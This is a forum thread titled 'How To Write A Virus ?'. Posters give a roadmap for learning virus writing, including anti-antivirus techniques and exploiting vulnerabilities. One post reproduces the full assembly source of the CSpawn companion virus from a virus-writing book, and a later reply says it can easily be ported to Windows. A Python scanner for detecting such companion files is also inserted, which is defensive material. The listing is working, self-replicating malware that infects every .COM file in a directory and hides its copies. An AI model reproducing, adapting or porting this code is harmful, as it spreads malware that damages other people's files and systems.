> How To Write A Virus ?
iGuest
post May 30 2008, 02:25 AM
Post #31





Bio, writing and releasing virus ain't good for anyone

-reply by XXXXXX
iGuest
post Jun 3 2008, 12:46 PM
Post #32





Replying to Darasen

That is not a virus, but a bug

-reply by Tony
iGuest
post Jul 6 2008, 01:05 PM
Post #33





Well, if you do make a virus, make sure it's only for education... I read that in 2003 there was a virus called Slammer, and like 27 million people couldn't use cell phones because of it... If someone's house was on fire and they were out in the country, they coulda lost their house or something because of not being able to call 000 or 911, or someone coulda been impaled on an object and died because of not being able to call emergency...

Anyway, my point is a virus can affect even people that don't have the internet or a PC, and in a way people can lose their lives because of it, not very likely but it is possible (although I guess if they're impaled it's not just 'cause of the virus they died)... Plus viruses cost people heaps of money...
wem83m2
post Jul 15 2008, 09:57 PM
Post #34





How to write a virus... interesting

Assuming that you only learned 16-bit assembly using Turbo or whatever, on a DOS emulator.

Well, first of all you'll have to learn Windows programming; you no longer use interrupts but you use kernel function calls.
Then you'll need to get familiar with a 32-bit assembler such as MASM (although you could write a virus with C, but it won't be as effective as assembly).
There is an excellent tutorial about using MASM here: http://win32assembly.online.fr/tutorials.html
You'll also need to study how operating systems work, and how they handle memory, disk space... and so forth.
After that, study how an antivirus works - then you can search for "Anti-AntiVirus techniques".
Then you'll need to learn about different software vulnerabilities, and how to exploit them, and the different file formats that your virus will work on (mainly EXEs and DLLs).
Then you'll want to read about different viral techniques that were used before: boot-sector, memory-residence, device driver viruses... etc.

One last hint: search for this name, "Mark Ludwig"; it should get you started.

After you've finished with all that, you'll know that there is no use in writing a virus, as you can do a lot better stuff with what you've learned.

A good virus is not the one that causes more damage, but the one that can replicate itself without getting caught.

I've heard recently that they are beginning to use viruses to fix some software vulnerabilities; the virus would spread from one place to another fixing the security holes.
wem83m2
post Jul 15 2008, 10:55 PM
Post #35





Here is an example of a primitive virus I got from some book.
It's called the companion virus. It changes the name of a *.com file to a *.con file, then names itself *.com. When it executes, it searches for com files in the directory to infect, then it starts the original file (which is now called *.con) and terminates.

The SPAWNR Virus Listing
The following virus can be assembled into a COM file by
MASM, TASM or A86 and executed directly.
;The CSpawn virus is a simple companion virus to illustrate how a companion
;virus works.
;
;© 1994 American Eagle Publications, Inc. All Rights Reserved!
.model tiny
.code
org 0100h
CSpawn:
mov sp,OFFSET FINISH + 100H ;Change top of stack
mov ah,4AH ;DOS resize memory fctn
mov bx,sp
mov cl,4
shr bx,cl
inc bx ;BX=# of para to keep
int 21H
mov bx,2CH ;set up EXEC param block
mov ax,[bx]
mov WORD PTR [PARAM_BLK],ax ;environment segment
mov ax,cs
mov WORD PTR [PARAM_BLK+4],ax ;@ of parameter string
mov WORD PTR [PARAM_BLK+8],ax ;@ of FCB1
mov WORD PTR [PARAM_BLK+12],ax ;@ of FCB2
mov dx,OFFSET REAL_NAME ;prep to EXEC
46 The Giant Black Book of Computer Viruses
mov bx,OFFSET PARAM_BLK
mov ax,4B00H
int 21H ;execute host
cli
mov bx,ax ;save return code here
mov ax,cs ;AX holds code segment
mov ss,ax ;restore stack first
mov sp,(FINISH - CSpawn) + 200H
sti
push bx
mov ds,ax ;Restore data segment
mov es,ax ;Restore extra segment
mov ah,1AH ;DOS set DTA function
mov dx,80H ;put DTA at offset 80H
int 21H
call FIND_FILES ;Find and infect files
pop ax ;AL holds return value
mov ah,4CH ;DOS terminate function
int 21H ;bye-bye
;The following routine searches for COM files and infects them
FIND_FILES:
mov dx,OFFSET COM_MASK ;search for COM files
mov ah,4EH ;DOS find first file function
xor cx,cx ;CX holds all file attributes
FIND_LOOP: int 21H
jc FIND_DONE ;Exit if no files found
call INFECT_FILE ;Infect the file!
mov ah,4FH ;DOS find next file function
jmp FIND_LOOP ;Try finding another file
FIND_DONE: ret ;Return to caller
COM_MASK db ’*.COM’,0 ;COM file search mask
;This routine infects the file specified in the DTA.
INFECT_FILE:
mov si,9EH ;DTA + 1EH
mov di,OFFSET REAL_NAME ;DI points to new name
INF_LOOP: lodsb ;Load a character
stosb ;and save it in buffer
or al,al ;Is it a NULL?
jnz INF_LOOP ;If so then leave the loop
mov WORD PTR [di-2],’N’ ;change name to CON & add 0
mov dx,9EH ;DTA + 1EH
mov di,OFFSET REAL_NAME
mov ah,56H ;rename original file
int 21H
jc INF_EXIT ;if can’t rename, already done
mov ah,3CH ;DOS create file function
mov cx,2 ;set hidden attribute
int 21H
mov bx,ax ;BX holds file handle
mov ah,40H ;DOS write to file function
mov cx,FINISH - CSpawn ;CX holds virus length
mov dx,OFFSET CSpawn ;DX points to CSpawn of virus
int 21H
mov ah,3EH ;DOS close file function
int 21H
INF_EXIT: ret
REAL_NAME db 13 dup (?) ;Name of host to execute
Companion Viruses 47
;DOS EXEC function parameter block
PARAM_BLK DW ? ;environment segment
DD 80H ;@ of command line
DD 5CH ;@ of first FCB
DD 6CH ;@ of second FCB
FINISH:
end CSpawn
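A defender's view of the behaviour described in post #35, as an added example that is not part of the original thread or the book it quotes: a directory scan that flags a NAME.COM sitting beside a same-named NAME.CON (the renamed host), reporting whether the .COM carries the hidden attribute the listing's comments mention. It goes one step beyond the post by also flagging a .COM beside a same-named .EXE, the other common companion layout, since DOS runs the .COM first. The function names and the sample file names are assumptions constructed for illustration.

```python
import os
import stat
import tempfile
from collections import defaultdict

HIDDEN = stat.FILE_ATTRIBUTE_HIDDEN  # DOS/Windows hidden bit (0x2)


def is_hidden(path):
    """Hidden attribute as reported by Windows; always False on other systems."""
    return bool(getattr(os.stat(path), "st_file_attributes", 0) & HIDDEN)


def find_companions(root):
    """Flag NAME.COM files that sit beside a NAME.CON (renamed host) or NAME.EXE."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        by_stem = defaultdict(dict)
        for name in files:
            stem, ext = os.path.splitext(name)
            by_stem[stem.lower()][ext.lower()] = os.path.join(dirpath, name)
        for stem in sorted(by_stem):
            exts = by_stem[stem]
            if ".com" not in exts:
                continue
            for host_ext, reason in ((".con", "renamed-host"), (".exe", "shadows-exe")):
                if host_ext in exts:
                    com, host = exts[".com"], exts[host_ext]
                    findings.append({
                        "reason": reason,
                        "companion": com,
                        "host": host,
                        "hidden": is_hidden(com),
                        "smaller_than_host": os.path.getsize(com) < os.path.getsize(host),
                    })
    return findings


def demo():
    """Build a constructed sample tree (placeholder zero bytes only) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        sizes = {"EDIT.COM": 300, "EDIT.CON": 9000, "MORE.COM": 2000,
                 "SETUP.COM": 300, "SETUP.EXE": 40000, "README.TXT": 50}
        for name, size in sizes.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(b"\x00" * size)
        return [(os.path.basename(f["companion"]), f["reason"], f["smaller_than_host"])
                for f in find_companions(root)]
```

A lone MORE.COM is not reported; only the paired layouts are, and a pair where the .COM is hidden and much smaller than its sibling deserves the closest look.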
xboxrulz
post Jul 15 2008, 11:49 PM
Post #36





This file looks like it can only work on DOS but not Windows.

xboxrulz
wem83m2
post Jul 16 2008, 12:11 AM
Post #37





QUOTE(xboxrulz @ Jul 16 2008, 02:49 AM) *
this file looks like it can only work on DOS but not Windows.

xboxrulz


Yes it does, but the point is how it actually works, then you can easily change it to work on Windows...